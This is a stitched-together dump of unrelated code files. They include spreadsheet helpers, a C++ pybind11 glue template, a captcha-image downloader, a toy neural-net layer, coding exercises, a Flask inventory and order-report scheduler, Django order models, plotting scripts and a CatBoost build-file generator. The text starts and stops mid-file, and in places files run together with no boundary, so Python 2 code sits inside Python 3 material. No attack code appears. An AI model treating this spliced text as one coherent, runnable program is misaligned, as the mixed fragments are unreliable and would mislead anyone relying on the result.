        # NOTE(review): `colors.GREEN`/`colors.RED` were removed in newer
        # openpyxl releases -- literal hex codes may be required there.
        NewCell.fill = PatternFill(fgColor=colors.GREEN, fill_type="solid")
        wb.save(ExcelFileLocation)
        return (NewCell.fill)
    def RedBgrColor(self,ExcelFileLocation,Sheetname,colno,rowno):
        """Fill a cell's background red and save."""
        wb = load_workbook(ExcelFileLocation,data_only=True)
        ReadExcel.sheetname = wb[Sheetname]
        sheetname=wb.active
        NewCell=sheetname.cell(row=colno, column=rowno)
        NewCell.fill = PatternFill(fgColor=colors.RED, fill_type="solid")
        wb.save(ExcelFileLocation)
        return (NewCell.fill)
    def __init__(self):
        '''
        No per-instance state; all helpers take explicit file locations.
        '''
|
from jinja2 import Template
# Jinja2 template that renders the C++ "SSI Upper" glue layer for a STITCHES
# subsystem: pybind11 conversions between the generated message structs and
# Python objects, plus callback plumbing for each inbound/outbound interface.
# NOTE(review): rendering expects ss_mod, ss_name, ss_fields, in_ints and
# out_ints in the context, plus helpers to_camel/type_to_c/field_to_c --
# confirm against the render call site.  The string below is emitted C++
# verbatim and must not be edited casually.
SSI_UPPER_TEMPLATE = Template("""
#include <string>
#include <mil/darpa/sosite/stitches/stitcheslib>
#include <pybind11/pybind11.h>
#include <pybind11/embed.h>
#include "spdlog/spdlog.h"
#include <{{ ss_mod }}/{{ ss_name }}/SSI/SSIMid.hpp>
#include <{{ ss_mod }}/{{ ss_name }}/SSI/SSIUpper.hpp>
// TODO: Include files for each interface
{% for in_int in in_ints %}
{% set i_name=in_int.name %}
#include <{{ ss_mod }}/{{ ss_name }}/SSI/{{ i_name }}/{{ i_name }}CallbackInterface.hpp>
{% endfor %}
namespace py = pybind11;
using namespace py::literals;
namespace {{ ss_mod }} {
namespace {{ ss_name }} {
namespace SSI {
{% for f in ss_fields %}
inline std::shared_ptr<{{ f._RESOURCE_MODULE}}::ftg::{{ f._RESOURCE_NAME }}> {{ f._RESOURCE_NAME }}FromPy(py::object pyObj) {
    std::shared_ptr<{{ f._RESOURCE_MODULE}}::ftg::{{ f._RESOURCE_NAME }}> outMsg = std::make_shared<{{ f._RESOURCE_MODULE}}::ftg::{{ f._RESOURCE_NAME }}>();
    {%- for sf in f._SUB_FIELDS %}
    outMsg->m{{ to_camel(sf.name) }} = pyObj.attr("{{ sf.name }}").cast<{{ type_to_c(sf.field_type.type) }}>();
    {% endfor -%}
    return outMsg;
};
{% endfor %}
{% for f in ss_fields %}
inline py::object {{ f._RESOURCE_NAME }}ToPy(std::shared_ptr<{{ f._RESOURCE_MODULE}}::ftg::{{ f._RESOURCE_NAME }}> sMsg) {
    spdlog::debug("Loading Field module {{ f._RESOURCE_NAME }}");
    py::object pyField;
    auto gil_state = PyGILState_Ensure();
    {
        py::module fieldMod = py::module::import("{{ f._RESOURCE_NAME }}");
        spdlog::debug("Loading Field class {{ f._RESOURCE_NAME }}");
        py::object fieldCls = fieldMod.attr("{{ f._RESOURCE_NAME }}");
        pyField = fieldCls();
        {%- for sf in f._SUB_FIELDS %}
        pyField.attr("{{ sf.name }}") = py::cast(sMsg->m{{ to_camel(sf.name) }});
        {% endfor -%}
    }
    PyGILState_Release(gil_state);
    return pyField;
};
{% endfor %}
class {{ ss_name }}SSIUpper : public SSIUpper {
public:
    {{ ss_name }}SSIUpper(py::object pySS)
        : SSIUpper() {
        wrappedCls = pySS;
        // this->wrappedCls.attr("init")();
        wrappedCls.attr("_int_cb") = py::cpp_function(
            [&](std::string intName, py::object intOut) {
                {% for out_int in out_ints %}
                if (intName == "{{out_int.name}}") {
                    std::shared_ptr<{{ field_to_c(out_int.type) }}> msgPtr = {{ out_int.type._RESOURCE_NAME}}FromPy(intOut);
                    //spdlog::debug("{}", *msgPtr);
                    send_{{ out_int.name }}(msgPtr);
                }
                {% endfor %}
            }
        );
    }
    ~{{ ss_name }}SSIUpper() {
    }
    void run() {
        this->wrappedCls.attr("run")();
    }
protected:
    py::object wrappedCls;
    void bindToCore() {
    }
    {% for in_int in in_ints %}
    {% set i_name=in_int.name %}
    {% set i_type=in_int.type %}
    class {{ i_name }}CallbackInterfaceImpl : public {{ i_name }}::{{ i_name }}CallbackInterface {
    public:
        {{ i_name }}CallbackInterfaceImpl (py::function cbFunc) {
            spdlog::debug("Binding Python callback {}", (void*)&cbFunc);
            this->cbFunc = cbFunc;
        }
        // Method invoked by SSI Mid upon receipt of STITCHES message
        bool process( mil::darpa::sosite::stitches::StitchesPtr< {{ i_type._RESOURCE_MODULE }}::{{ i_type._RESOURCE_GROUP }}::{{ i_type._RESOURCE_NAME }} > stitches_msg ) {
            spdlog::debug("Converting message to Python");
            auto gil_state = PyGILState_Ensure();
            {
                convertedObj = {{ i_type._RESOURCE_NAME }}ToPy(stitches_msg);
                spdlog::debug("Invoking callback with py object object");
                this->cbFunc(convertedObj);
            }
            PyGILState_Release(gil_state);
            return true;
        }
    protected:
        py::function cbFunc;
        py::object convertedObj;
    };
    {{ i_name }}CallbackInterfaceImpl* {{ i_name }}Cb;
    {{ i_name }}::{{ i_name }}CallbackInterface* instantiate{{ i_name }}CallbackInterface() {
        spdlog::info("Instantiating callback for interface {{ i_name }}");
        py::function cbFunc = (py::function)this->wrappedCls.attr("{{ in_int.method.__name__ }}");
        {{ i_name }}Cb = new {{ i_name }}CallbackInterfaceImpl(cbFunc);
        spdlog::info("Done instantiating callback for interface {{ i_name }} {}", (void*){{ i_name }}Cb);
        return ({{ ss_mod }}::{{ ss_name }}::SSI::{{ i_name }}::{{ i_name }}CallbackInterface*) {{ i_name }}Cb;
    };
    {% endfor %}
};
}
}
}
""")
import requests
import cv2
import numpy as np
# Download captcha images from link and save
def get_image_link(link):
    """Download image from given url.

    :param link: given url where image is located
    :return: grayscale image downloaded from url
    :raises Exception: re-raises the raise_for_status() error on failure
    """
    req = requests.get(link)
    try:
        req.raise_for_status()
    except Exception as exc:
        print('There was a problem: %s' % exc)
        # BUG FIX: the original swallowed the error and then decoded the
        # failed response body anyway; propagate so callers (get_image)
        # can fall back to the path loader instead.
        raise
    loaded_image = req.content
    loaded_image = cv2.imdecode(np.asarray(bytearray(loaded_image)), 1)
    loaded_image = cv2.cvtColor(loaded_image, cv2.COLOR_BGR2GRAY)
    return loaded_image
# Get image from external file(path)
def get_image_path(path):
    """Load image from local directory.

    :param path: given path where image is stored
    :return: (grayscale image, label) where label is the file name stem
    """
    gray_image = cv2.cvtColor(cv2.imread(path), cv2.COLOR_BGR2GRAY)
    # Label = file name without directory (either separator) or extension.
    base_name = path.split('/')[-1]
    base_name = base_name.split('\\')[-1]
    label = base_name.split('.')[0]
    return gray_image, label
# Determine if input is link or path & return image
def get_image(which):
    """Decide if parameter is a link or directory, and load image from it.

    :param which: link or directory to where image is located
    :return: image pulled from link or directory, or None if both fail
    """
    # BUG FIX: the original bare `except:` also swallowed SystemExit and
    # KeyboardInterrupt; catch only ordinary exceptions.
    try:
        return get_image_link(which)
    except Exception:
        try:
            image, _label = get_image_path(which)
            return image
        except Exception:
            print('Load error. Try again')
|
import numpy as np
# Fixed seed so the randomly-initialised weights are reproducible.
np.random.seed(0)
# Batch of 3 samples x 4 features.
X =[[1, 2, 3, 2.5], #need to normalize and scale this dataset to this range[-1,1]
    [2.0, 5.0, -1.0,2.0],
    [-1.5, 2.7, 3.3, -0.8]]
# NOTE(review): `bais` (sic, presumably "bias") is never used below.
bais =[]
class Layer_Dense:
    """A fully-connected layer: output = inputs @ weights + biases."""

    def __init__(self, n_inputs, n_neurons):
        # n_inputs = number of features per sample.  Weights start as small
        # random values; biases start at zero (same scheme as before).
        self.weights = 0.10*np.random.randn(n_inputs, n_neurons)
        self.biases = np.zeros((1, n_neurons))

    def forward(self, inputs):
        """Compute and store the layer activation for a batch of samples."""
        self.output = np.dot(inputs, self.weights) + self.biases
# Build a tiny 2-layer network: 4 features -> 5 neurons -> 2 neurons.
Layer1 = Layer_Dense(4,5)
Layer2 = Layer_Dense(5,2) # Layer2's input size must equal Layer1's output size
# Forward pass: feed the batch through both layers and print the result.
Layer1.forward(X)
Layer2.forward(Layer1.output)
# print(Layer1.output)
print(Layer2.output)
# randn draws from a standard normal distribution; the 0.10 factor keeps
# the initial weights small.  The (rows, cols) arguments set the weight
# matrix shape.
#!C:\Python27
def loop_test():
    """Print every integer from 1 to 12344 inclusive (Python 2 syntax)."""
    for each in range(1, 12345):
        print each
# Runs at import time; the commented guard below was the alternative.
loop_test()
# if __name__ == '__main__':
#     loop_test()
|
# ex6_3: iterate a dictionary and print each key's definition
dictionary = {'items': "the content of a dictionary",
              'key': 'the handle of data',
              'value': 'the data that saved in items'}

for term in dictionary:
    print('\nThe meaning of ' + str(term) + ' is:')
    print(dictionary[term])
|
# 165.比较版本号
class Solution:
    def compareVersion(self, version1: str, version2: str) -> int:
        """Compare dotted version strings: 1 if v1 > v2, -1 if v1 < v2, else 0.

        Leading zeros in a field are insignificant (int conversion), as are
        trailing zero fields ('1.0' == '1').
        """
        def fields(version):
            # Parse each dot-separated field as an int, then strip the
            # insignificant trailing zero fields.
            parts = [int(p) for p in version.split('.')]
            while parts and parts[-1] == 0:
                parts.pop()
            return parts

        a, b = fields(version1), fields(version2)
        # Compare the common prefix field by field.
        for x, y in zip(a, b):
            if x != y:
                return 1 if x > y else -1
        # Prefix equal: the longer (already-stripped) version is larger.
        if len(a) == len(b):
            return 0
        return 1 if len(a) > len(b) else -1
if __name__ == '__main__':
    # Quick manual check; further cases kept below for reference.
    obj = Solution()
    print(obj.compareVersion('1', '0'))
    # print(obj.compareVersion('1.0.0', '1.0'))
    # print(obj.compareVersion('1.01', '1.001'))
    # print(obj.compareVersion('0.1', '1.1'))
    # print(obj.compareVersion('1.0.1', '1'))
    # print(obj.compareVersion('7.5.2.4', '7.5.3'))
import uuid
import xlwt
import time, datetime
from app.models import db, Order, Store, Affair
from utils.comment import scheduler
def Create_id():
    """Return a fresh 32-character hex id (uuid1 with the dashes removed)."""
    return str(uuid.uuid1()).replace('-', '')
def get_page(request, database, id):
    """Paginate `database` (a Flask-SQLAlchemy model) ordered by `id`.

    Page number comes from the request's `page` query arg (default 1) and
    page size from `page_num`.  The default of 7 rows suits the IE layout;
    the Chrome layout used 9 (kept below for reference).
    :return: (items_for_page, paginate_object)
    """
    page = int(request.args.get('page', 1))
    # page_num = int(request.args.get('page_num', 9))
    page_num = int(request.args.get('page_num', 7))
    paginate = database.query.order_by(id).paginate(page, page_num)
    return paginate.items, paginate
# 定时生成订货报表
def generate_order():
    """Scheduled job: export all pending orders (order_status == 0) to an
    .xls purchase report and mark each exported order as written
    (order_status = 1).

    The spreadsheet is saved under static/order_folder/, named with
    today's date.  Column layout: row no., order id, part id, part name,
    primary supplier info, secondary supplier info (or '/'), unit price,
    quantity, total price.
    """
    # Create the workbook and its single worksheet.
    workbook = xlwt.Workbook(encoding='utf-8')
    worksheet = workbook.add_sheet('订货报表')
    # Column headers (Chinese UI strings; do not translate -- user facing).
    order_data_head = ['序号', '订货编号', '零件编号', '零件名称', '供应商编号(主)',
                       '名称', '联系人名称', '联系方式', '地址', '供应商编号(次)',
                       '名称', '联系人名称', '联系方式', '地址', '零件单价(元)',
                       '采购数量(件)', '采购总金额(元)']
    # --- Report title: merged across all columns, centered, bordered ---
    head_style = xlwt.XFStyle()
    head_font = xlwt.Font()
    head_font.name = '宋体'
    # xlwt font height is in 1/20-point units: 18 pt here.
    head_font.height = 20 * 18
    head_style.font = head_font
    head_alignment = xlwt.Alignment()
    head_alignment.horz = xlwt.Alignment.HORZ_CENTER
    head_alignment.vert = xlwt.Alignment.VERT_CENTER
    head_style.alignment = head_alignment
    head_borders = xlwt.Borders()
    head_borders.left, head_borders.right, head_borders.top, head_borders.bottom = xlwt.Borders.THIN, xlwt.Borders.THIN, xlwt.Borders.THIN, xlwt.Borders.THIN
    head_style.borders = head_borders
    # Title occupies rows 0-3.
    worksheet.write_merge(0, 3, 0, len(order_data_head) - 1, '零件订货报表', head_style)
    # --- Generation-timestamp row: left-aligned, 12 pt ---
    time_style = xlwt.XFStyle()
    time_font = xlwt.Font()
    time_font.name = '宋体'
    time_font.height = 20 * 12
    time_style.font = time_font
    time_alignment = xlwt.Alignment()
    time_alignment.horz = xlwt.Alignment.HORZ_LEFT
    time_alignment.vert = xlwt.Alignment.VERT_CENTER
    time_style.alignment = time_alignment
    time_borders = xlwt.Borders()
    time_borders.left, time_borders.right, time_borders.top, time_borders.bottom = xlwt.Borders.THIN, xlwt.Borders.THIN, xlwt.Borders.THIN, xlwt.Borders.THIN
    time_style.borders = time_borders
    # Timestamp on row 4.
    strtime_ = time.strftime("%Y-%m-%d")
    time_ = '报表生成时间:' + strtime_
    worksheet.write_merge(4, 4, 0, len(order_data_head) - 1, time_, time_style)
    # --- Column-header row style: centered, 10 pt ---
    data_head_style = xlwt.XFStyle()
    data_head_font = xlwt.Font()
    data_head_font.name = '宋体'
    data_head_font.height = 20 * 10
    data_head_style.font = data_head_font
    data_head_alignment = xlwt.Alignment()
    data_head_alignment.horz = xlwt.Alignment.HORZ_CENTER
    data_head_alignment.vert = xlwt.Alignment.VERT_CENTER
    data_head_style.alignment = data_head_alignment
    data_head_borders = xlwt.Borders()
    data_head_borders.left, data_head_borders.right, data_head_borders.top, data_head_borders.bottom = xlwt.Borders.THIN, xlwt.Borders.THIN, xlwt.Borders.THIN, xlwt.Borders.THIN
    data_head_style.borders = data_head_borders
    # Write the column headers on row 5, sizing each column as we go.
    for idx, i in enumerate(order_data_head):
        worksheet.col(idx).width = 3333
        worksheet.write(5, idx, i, data_head_style)
    # The row-number column can be narrow.
    worksheet.col(0).width = 1111
    # --- Data-row style: left-aligned, 10 pt ---
    data_style = xlwt.XFStyle()
    data_font = xlwt.Font()
    data_font.name = '宋体'
    data_font.height = 20 * 10
    data_style.font = data_font
    data_alignment = xlwt.Alignment()
    data_alignment.horz = xlwt.Alignment.HORZ_LEFT
    data_alignment.vert = xlwt.Alignment.VERT_CENTER
    data_style.alignment = data_alignment
    data_borders = xlwt.Borders()
    data_borders.left, data_borders.right, data_borders.top, data_borders.bottom = xlwt.Borders.THIN, xlwt.Borders.THIN, xlwt.Borders.THIN, xlwt.Borders.THIN
    data_style.borders = data_borders
    # --- Data rows: one per pending order, starting at row 6 ---
    with scheduler.app.app_context():
        orders = db.session.query(Order).filter_by(order_status=0).order_by('order_id').all()
        for order_idx, i in enumerate(orders):
            # Only orders with a part and a primary supplier are exported.
            if i.o_part != None and i.o_part.p_supplier != None:
                worksheet.write(6 + order_idx, 0, order_idx + 1, data_style)
                # Ids are zero-padded to 8 digits.
                order_id_ = str(i.order_id)
                order_id = order_id_.zfill(8)
                worksheet.write(6 + order_idx, 1, order_id, data_style)
                part_id_ = str(i.part_id)
                part_id = part_id_.zfill(8)
                worksheet.write(6 + order_idx, 2, part_id, data_style)
                worksheet.write(6 + order_idx, 3, i.o_part.part_name, data_style)
                p_supper_id_ = str(i.o_part.p_supplier_id)
                p_supper_id = p_supper_id_.zfill(8)
                worksheet.write(6 + order_idx, 4, p_supper_id, data_style)
                # NOTE(review): columns 5/6 write contact name before
                # supplier name, but the headers list name first -- confirm
                # which order is intended.
                worksheet.write(6 + order_idx, 5, i.o_part.p_supplier.supplier_contact_name, data_style)
                worksheet.write(6 + order_idx, 6, i.o_part.p_supplier.supplier_name, data_style)
                worksheet.write(6 + order_idx, 7, i.o_part.p_supplier.supplier_contact, data_style)
                worksheet.write(6 + order_idx, 8, i.o_part.p_supplier.supplier_address, data_style)
                if i.o_part.s_supplier != None:
                    s_supper_id_ = str(i.o_part.s_supplier_id)
                    s_supper_id = s_supper_id_.zfill(8)
                    worksheet.write(6 + order_idx, 9, s_supper_id, data_style)
                    worksheet.write(6 + order_idx, 10, i.o_part.s_supplier.supplier_contact_name, data_style)
                    worksheet.write(6 + order_idx, 11, i.o_part.s_supplier.supplier_name, data_style)
                    worksheet.write(6 + order_idx, 12, i.o_part.s_supplier.supplier_contact, data_style)
                    worksheet.write(6 + order_idx, 13, i.o_part.s_supplier.supplier_address, data_style)
                else:
                    # No secondary supplier: fill its columns with '/'.
                    worksheet.write(6 + order_idx, 9, '/', data_style)
                    worksheet.write(6 + order_idx, 10, '/', data_style)
                    worksheet.write(6 + order_idx, 11, '/', data_style)
                    worksheet.write(6 + order_idx, 12, '/', data_style)
                    worksheet.write(6 + order_idx, 13, '/', data_style)
                worksheet.write(6 + order_idx, 14, i.o_part.part_price, data_style)
                worksheet.write(6 + order_idx, 15, i.order_num, data_style)
                worksheet.write(6 + order_idx, 16, (i.order_num * i.o_part.part_price), data_style)
                # Mark this order as written to a report.
                i.order_status = 1
                db.session.commit()
    # (A purchaser-signature section was planned here but never implemented.)
    # Save the spreadsheet, named with today's date.
    xls_dir = 'static/order_folder/订货报表' + strtime_ + '.xls'
    workbook.save(xls_dir)
    print('订货报表已经生成')
def update_store():
    """Hourly scheduled job: apply pending stock transactions, then
    reconcile orders against stock thresholds.

    Phase 1 replays unprocessed Affair rows (oldest first) against the
    Store table; phase 2 creates/updates/deletes pending Order rows for
    any part whose stock is below its critical value.
    (Original note: runs once an hour, tentatively 07:00-16:00.)
    """
    with scheduler.app.app_context():
        # Phase 1: fetch unprocessed affairs ordered by commit time so
        # they are applied in submission order.
        affairs = db.session.query(Affair).filter_by(affair_status=0).order_by('affair_commit_time').all()
        for affair in affairs:
            store = db.session.query(Store).filter_by(part_id=affair.part_id).first()
            if store != None:
                # Outbound (type 0) and there is enough stock to ship.
                if affair.affair_type == 0 and affair.affair_num <= store.store_num:
                    store.store_num = store.store_num - affair.affair_num
                    # Mark the affair as processed and stamp completion time.
                    affair.affair_status = 1
                    time_str = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
                    curr_time = datetime.datetime.strptime(time_str, '%Y-%m-%d %H:%M:%S')
                    affair.affair_finish_time = curr_time
                    db.session.commit()
                # Inbound (type 1) and the result stays within capacity.
                elif affair.affair_type == 1 and affair.affair_num + store.store_num <= store.store_max:
                    # Mark the affair as processed and stamp completion time.
                    store.store_num = store.store_num + affair.affair_num
                    affair.affair_status = 1
                    time_str = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
                    curr_time = datetime.datetime.strptime(time_str, '%Y-%m-%d %H:%M:%S')
                    affair.affair_finish_time = curr_time
                    if affair.order_id != None:
                        # Tied to an order: bump its purchased quantity,
                        # capped at the ordered amount.
                        order = Order.query.filter_by(order_id=affair.order_id).first()
                        order.purchased_num = min((order.purchased_num + affair.affair_num), order.order_num)
                        # o_time_str = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
                        # o_curr_time = datetime.datetime.strptime(o_time_str, '%Y-%m-%d %H:%M:%S')
                        order.order_time = curr_time
                    db.session.commit()
                # Anything else (insufficient stock / over capacity):
                # leave the affair pending for a later run.
                else:
                    pass
            else:
                pass
        # Phase 2: reconcile orders against the refreshed stock levels.
        stores_list = db.session.query(Store).order_by('store_id').all()
        for i in stores_list:
            # Stock below its critical value: ensure an order covers the gap.
            if i.store_num < i.store_cv:
                # Orders already written to a report (status 1) whose
                # purchased quantity is still short of the ordered amount
                # count toward inventory already "on the way".
                order_writed = db.session.query(Order).filter(Order.part_id == i.part_id, Order.order_status == 1,
                                                              Order.purchased_num < Order.order_num).all()
                pre_order_num = 0
                pre_purchased_num = 0
                # need_order_num = 0
                for j in order_writed:
                    pre_order_num = pre_order_num + j.order_num
                    pre_purchased_num = pre_purchased_num + j.purchased_num
                # Top up to store_max, minus what is already outstanding.
                need_order_num = i.store_max - i.store_num - (pre_order_num - pre_purchased_num)
                if need_order_num > 0:
                    order = db.session.query(Order).filter_by(part_id=i.part_id, order_status=0).first()
                    if order != None:
                        # A pending (unwritten, status 0) order exists:
                        # refresh its quantity and timestamp.
                        order.order_num = need_order_num
                        time_str = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
                        curr_time = datetime.datetime.strptime(time_str, '%Y-%m-%d %H:%M:%S')
                        order.order_time = curr_time
                        db.session.commit()
                    else:
                        # Otherwise create a brand-new pending order row.
                        order_new = Order(order_num=need_order_num, purchased_num=0, part_id=i.part_id,
                                          order_status=0)
                        order_new.save()
            else:
                # Stock is fine: delete any order not yet written to a report.
                ordering = db.session.query(Order).filter_by(part_id=i.part_id, order_status=0).first()
                if ordering != None:
                    db.session.delete(ordering)
                    db.session.commit()
        print('库存清单已经更新,已经生成对应的订货信息')
|
# Exercise 2: Figure out which line of the above program is still not
# properly guarded. See if you can construct a text file which causes the
# program to fail and then modify the program so that the line is properly
# guarded and test it to make sure it handles your new text file.
# Exercise 3: Rewrite the guardian code in the above example without
# two if statements. Instead, use a compound logical expression using
# the or logical operator with a single if statement.
# Open the mailbox file up front; a missing file is the only expected
# failure mode, so catch it specifically rather than with a bare except
# (which would also hide typos such as a misspelled variable name).
try:
    fhand = open('mbox-short.txt')
except FileNotFoundError:
    print("The file doesn't exist")
    exit()
for line in fhand:
    words = line.split()
    # print('Debug:', words)
    # Single compound guard: skip lines that are not 'From' lines AND
    # lines too short to have a third word (protects words[2] below).
    if len(words) < 3 or words[0] != 'From': continue
    print(words[2])
|
from django.db import models
from main.models import User, Product
from enum import Enum
# Create your models here.
class Status(Enum):
    """Order lifecycle states; values are the human-readable Russian
    labels stored in Order.status (see its choices/default below).
    Note: the PROCCESING misspelling is kept -- it is referenced as
    Status.PROCCESING elsewhere in this module."""
    PROCCESING = 'В обработке'
    SHIPMENT = 'Отправлен'
    CLOSED = 'Закрыт'
    def __str__(self):
        # Display the label, not the enum member name.
        return self.value
class Order(models.Model):
    """A customer's order; its line items are TempProduct rows that
    point back here via TempProduct.order."""
    # SET_NULL keeps the order record even if the user account is deleted.
    client = models.ForeignKey(User,on_delete=models.SET_NULL, null=True, blank=True)
    first_name = models.CharField(verbose_name='Имя', max_length=50, null=True)
    last_name = models.CharField(verbose_name='Фамилия', max_length=50, null=True)
    email = models.EmailField(verbose_name='Email', null=True)
    address = models.CharField(verbose_name='Адрес', max_length=250, null=True)
    postal_code = models.CharField(verbose_name='Почтовый код', max_length=20, null=True)
    city = models.CharField(verbose_name='Город', max_length=100)
    created = models.DateTimeField(verbose_name='Создан', auto_now_add=True, null=True)
    updated = models.DateTimeField(verbose_name='Обновлен', auto_now=True, null=True)
    # Status stored as the human-readable Russian value (Status enum).
    status = models.CharField(max_length=20, choices=[(status.value, status.name) for status in Status], default=Status.PROCCESING.value)
    paid = models.BooleanField(verbose_name='Оплачен', default=False, null=True)
    def get_total_cost(self):
        """Total price of the order: sum of get_cost() over its line items."""
        return sum(item.get_cost() for item in TempProduct.objects.filter(order=self))
    def __str__(self):
        return 'Заказ: {}'.format(self.id)
class TempProduct(models.Model):
    """One line item of an Order: a product plus quantity and the unit
    price captured at order time."""
    order = models.ForeignKey(Order, on_delete=models.CASCADE, blank=True, null=True)
    product = models.ForeignKey(Product, on_delete=models.CASCADE, blank=True, null=True)
    quantity = models.PositiveIntegerField(verbose_name="Количество", default=1)
    # Unit price snapshot, independent of the current Product price.
    price = models.PositiveIntegerField(verbose_name="Цена", null=True)
    def __str__(self):
        return '{}'.format(self.id)
    def get_cost(self):
        """Line total: unit price times quantity."""
        return self.price * self.quantity
|
from scipy.interpolate import UnivariateSpline
import numpy as np
from matplotlib import pyplot as plt
from matplotlib import style

# Noisy samples of a Gaussian bump: exp(-x^2) plus N(0, 0.1) noise.
sample_x = np.linspace(-3, 3, 50)
sample_y = np.exp(-sample_x ** 2) + 0.1 * np.random.randn(50)
plt.plot(sample_x, sample_y, 'ro', ms=5)

# Fit a univariate smoothing spline and evaluate it on a dense grid.
fitted_spline = UnivariateSpline(sample_x, sample_y)
dense_x = np.linspace(-3, 3, 1000)
#plt.plot(dense_x,fitted_spline(dense_x),'g',lw=4)
fitted_spline.set_smoothing_factor(0.5)
plt.plot(dense_x, fitted_spline(dense_x), 'b', lw=3)
plt.show()
|
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
import scipy.stats as st
import seaborn as sns

# Load every benchmark run (traverse_0_1 .. traverse_0_5), tagging each
# frame with its run id, then concatenate once.  The original duplicated
# the load logic for the first file (with a pointless f'{1}' literal) and
# re-concatenated inside the loop, copying the accumulated frame each time.
frames = []
for n in range(1, 6):
    df = pd.read_csv(f'Benchmark/csv/traverse_0_{n}.csv', sep='\t', index_col=0)
    df['run number'] = f'traverse_0_{n}'
    frames.append(df)
Traverse_data = pd.concat(frames)
#%%
# One line per run: runtime vs. node count, line style distinguishing users.
sns.set(rc={'figure.figsize':(15,10)})
plot = sns.lineplot(data=Traverse_data, x='Nodes Number', y='Run Time (s)', hue='run number', style = 'user')
plot.figure.savefig("Benchmark/csv/graficone.jpg", dpi = 1000, bbox_inches='tight')
|
#!/usr/bin/env python
import os
import string
def generate_project(src_dir, substitution_dict, dst_dir):
    """Instantiate the template pom.xml files from *src_dir* into *dst_dir*.

    Each template is read, its ``${placeholder}`` markers are replaced via
    string.Template.safe_substitute (unknown placeholders are left intact),
    and the result is written to the same relative path under *dst_dir*,
    creating directories as needed.
    """
    for path in ('pom.xml', 'macros/pom.xml', 'core/pom.xml'):
        with open(os.path.join(src_dir, path)) as src_file:
            src = src_file.read()
        dst = string.Template(src).safe_substitute(substitution_dict)
        dst_path = os.path.join(dst_dir, path)
        # exist_ok avoids the check-then-create race of the original
        # os.path.exists() / os.makedirs() pair.
        os.makedirs(os.path.dirname(dst_path), exist_ok=True)
        with open(dst_path, 'w') as dst_file:
            dst_file.write(dst)
# Substitutions shared by every generated project.
# (The 'substitition' misspelling is kept: the driver loop below uses it.)
global_substitition_dict = {
    'catboost_version_placeholder': '1.2.1',
    'relative_global_project_root_placeholder': '../..'
}

# scala-maven-plugin snippet for Scala < 2.13: macro support comes from the
# macro-paradise compiler plugin.
scala_maven_plugin_configuration_scala_pre_2_13 = """
<compilerPlugins>
<compilerPlugin>
<groupId>org.scalamacros</groupId>
<artifactId>paradise_${scala.version}</artifactId>
<version>2.1.1</version>
</compilerPlugin>
</compilerPlugins>
"""

# Scala 2.13+ enables macro annotations with a compiler flag instead.
scala_maven_plugin_configuration_scala_2_13 = """
<args>
<arg>-Ymacro-annotations</arg>
</args>
"""
# One entry per published Spark/Scala combination.  Each substitution_dict
# feeds generate_project() and its keys must match the ${...} placeholders
# in the template pom.xml files.  NOTE: 'netty_all_version_placeholer'
# keeps the templates' existing spelling -- do not "fix" it here alone.
configs = [
    {
        'dst_dir' : '../projects/spark_2.3_2.11',
        'substitution_dict' : {
            'version_specific_src_dir': 'spark_2_x/scala',
            'scala_compat_version_placeholder': '2.11',
            'scala_version_placeholder': '2.11.12',
            'spark_compat_version_placeholder': '2.3',
            'spark_version_placeholder': '2.3.0',
            'hadoop_version_placeholder': '2.7.3',
            'json4s_version_placeholder': '3.2.11',
            'netty_all_version_placeholer': '4.1.42.Final',
            'scala_maven_plugin_configuration_placeholder': scala_maven_plugin_configuration_scala_pre_2_13
        }
    },
    {
        'dst_dir' : '../projects/spark_2.4_2.11',
        'substitution_dict' : {
            'version_specific_src_dir': 'spark_2_x/scala',
            'scala_compat_version_placeholder': '2.11',
            'scala_version_placeholder': '2.11.12',
            'spark_compat_version_placeholder': '2.4',
            'spark_version_placeholder': '2.4.0',
            'hadoop_version_placeholder': '2.7.3',
            'json4s_version_placeholder': '3.5.3',
            'netty_all_version_placeholer': '4.1.72.Final',
            'scala_maven_plugin_configuration_placeholder': scala_maven_plugin_configuration_scala_pre_2_13
        }
    },
    {
        'dst_dir' : '../projects/spark_2.4_2.12',
        'substitution_dict' : {
            'version_specific_src_dir': 'spark_2_x/scala',
            'scala_compat_version_placeholder': '2.12',
            'scala_version_placeholder': '2.12.12',
            'spark_compat_version_placeholder': '2.4',
            'spark_version_placeholder': '2.4.1',
            'hadoop_version_placeholder': '2.7.3',
            'json4s_version_placeholder': '3.5.3',
            'netty_all_version_placeholer': '4.1.72.Final',
            'scala_maven_plugin_configuration_placeholder': scala_maven_plugin_configuration_scala_pre_2_13
        }
    },
    {
        'dst_dir' : '../projects/spark_3.0_2.12',
        'substitution_dict' : {
            'version_specific_src_dir': 'spark_3_x/scala',
            'scala_compat_version_placeholder': '2.12',
            'scala_version_placeholder': '2.12.12',
            'spark_compat_version_placeholder': '3.0',
            'spark_version_placeholder': '3.0.1',
            'hadoop_version_placeholder': '2.7.3',
            'json4s_version_placeholder': '3.6.6',
            'netty_all_version_placeholer': '4.1.72.Final',
            'scala_maven_plugin_configuration_placeholder': scala_maven_plugin_configuration_scala_pre_2_13
        }
    },
    {
        'dst_dir' : '../projects/spark_3.1_2.12',
        'substitution_dict' : {
            'version_specific_src_dir': 'spark_3_x/scala',
            'scala_compat_version_placeholder': '2.12',
            'scala_version_placeholder': '2.12.12',
            'spark_compat_version_placeholder': '3.1',
            'spark_version_placeholder': '3.1.0',
            'hadoop_version_placeholder': '3.2.0',
            'json4s_version_placeholder': '3.7.0-M5',
            'netty_all_version_placeholer': '4.1.72.Final',
            'scala_maven_plugin_configuration_placeholder': scala_maven_plugin_configuration_scala_pre_2_13
        }
    },
    {
        'dst_dir' : '../projects/spark_3.2_2.12',
        'substitution_dict' : {
            'version_specific_src_dir': 'spark_3_x/scala',
            'scala_compat_version_placeholder': '2.12',
            'scala_version_placeholder': '2.12.12',
            'spark_compat_version_placeholder': '3.2',
            'spark_version_placeholder': '3.2.0',
            'hadoop_version_placeholder': '3.3.1',
            'json4s_version_placeholder': '3.7.0-M11',
            'netty_all_version_placeholer': '4.1.72.Final',
            'scala_maven_plugin_configuration_placeholder': scala_maven_plugin_configuration_scala_pre_2_13
        }
    },
    {
        'dst_dir' : '../projects/spark_3.2_2.13',
        'substitution_dict' : {
